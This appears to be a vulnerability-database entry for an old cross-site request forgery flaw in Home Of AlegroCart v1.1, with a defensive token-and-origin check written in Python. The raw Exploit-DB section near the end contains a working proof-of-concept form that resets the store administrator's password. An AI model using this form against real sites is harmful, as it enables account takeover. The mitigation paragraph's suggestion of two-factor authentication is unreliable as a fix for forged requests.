Vendor: Home Of AlegroCart
By: The.Morpheus
CVSS: 8.8 (HIGH)
CWE: 352, Cross-Site Request Forgery (XSRF)
Product Name: Home Of AlegroCart
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:alegrocart:home_of_alegrocart
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Home Of AlegroCart v1.1 – XSRF Change Administrator Password

A cross-site request forgery (XSRF) vulnerability in Home Of AlegroCart v1.1 allows an attacker to change the administrator password by sending a malicious request to the server. The malicious request is a form containing the username, first name, last name, email, user group, password, and confirm fields. The form posts to the admin user update action (controller=user, action=update) and carries no anti-forgery token. The attacker sets the username, first name, last name, and email fields to 'admin', the user group to 'Top Administrator', and the password and confirm fields to the desired password. When the form is submitted, the administrator password is changed to the desired password.

Mitigation:

To mitigate this vulnerability, the application should use a secure authentication mechanism such as two-factor authentication or a secure token-based authentication system.
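A token-based check applied to the user update request described above, as an added example (a framework-neutral sketch, not AlegroCart's own code). The names SERVER_KEY, ADMIN_ORIGIN, csrf_token, issue_csrf_token and check_user_update are assumptions; the form field names are the ones shown in the raw data on this page.

```python
import hashlib
import hmac
import secrets

# Assumption: a per-deployment secret kept server-side (constructed here).
SERVER_KEY = secrets.token_bytes(32)
# Assumption: the admin panel's own origin (placeholder host).
ADMIN_ORIGIN = "https://shop.example"


def issue_csrf_token(session_id: str) -> str:
    """Token bound to one admin session; embedded as a hidden form field."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_user_update(session_id: str, headers: dict, form: dict) -> tuple:
    """Gate for POST ?controller=user&action=update. Returns (allowed, reason)."""
    # 1. A cross-site form post carries another site's Origin, or none at all.
    if headers.get("Origin") != ADMIN_ORIGIN:
        return False, "origin mismatch"
    # 2. A forged form cannot know the session-bound token.
    sent = form.get("csrf_token", "")
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(sent.encode(), expected.encode()):
        return False, "bad or missing csrf token"
    # 3. Password fields must agree before any change is applied.
    if form.get("password", "") != form.get("confirm", ""):
        return False, "password and confirm differ"
    return True, "ok"


# Constructed sample requests using the field names from the form on this page.
FIELDS = {"username": "admin", "firstname": "admin", "lastname": "admin",
          "email": "admin", "user_group_id": "1",
          "password": "new-pass", "confirm": "new-pass"}
SESSION = "constructed-session-id"


def demo() -> dict:
    forged = check_user_update(SESSION, {"Origin": "https://other.example"}, dict(FIELDS))
    no_token = check_user_update(SESSION, {"Origin": ADMIN_ORIGIN}, dict(FIELDS))
    genuine = check_user_update(SESSION, {"Origin": ADMIN_ORIGIN},
                                {**FIELDS, "csrf_token": issue_csrf_token(SESSION)})
    return {"forged": forged, "no_token": no_token, "genuine": genuine}


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Because the token is derived from the session identifier, a token lifted from one session is rejected in another.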

Exploit-DB raw data:

[#]----------------------------------------------------------------[#]
#
# [+] Home Of AlegroCart v1.1 - [ Xsrf] Change Administrator Password
#
# // Author Info
# [x] Author: The.Morpheus
# [x] Contact: fats0L@windowslive.com
# [x] Thanks: Türksec.İnfo ~ Nd And Tg Tayfa :P
# [x] Date : 01.02.2010
#
[#]-------------------------------------------------------------------------------------------[#]

# Download : http://forum.alegrocart.com/viewtopic.php?f=8&t=4

# [x] Exploit :
#
# [ XSRF ]
#
# [ Login ]
# http://[server]/[path]/admin/
#
# // Start XSRF
|-------------------------------------------------------------------------------|

<form action="http://server/admin/?controller=user&user_id=1&action=update;action=update" method="post" enctype="multipart/form-data" id="form">
width="185"><span class="required">*</span> Username:</td>
<input type="text" name="username" value="admin">
<span class="required">*</span> First Name:</td>
<input type="text" name="firstname" value="admin">
<span class="required">*</span> Last Name:</td>
<input type="text" name="lastname" value="admin">
<td>E-Mail:</td>
<input type="text" name="email" value="admin"></td>
<td>User Group:</td>
<td><select name="user_group_id">
<option value="1" selected>Top Administrator</option>
</select></td>
<td>Password:</td>
<input type="password" name="password" value="" >
<td>Confirm:</td>
<input type="password" name="confirm" value="">
</form>


|-------------------------------------------------------------------------------|
# // End of attack ~
#
[#]------------------------------------------------------------------------------------------[#]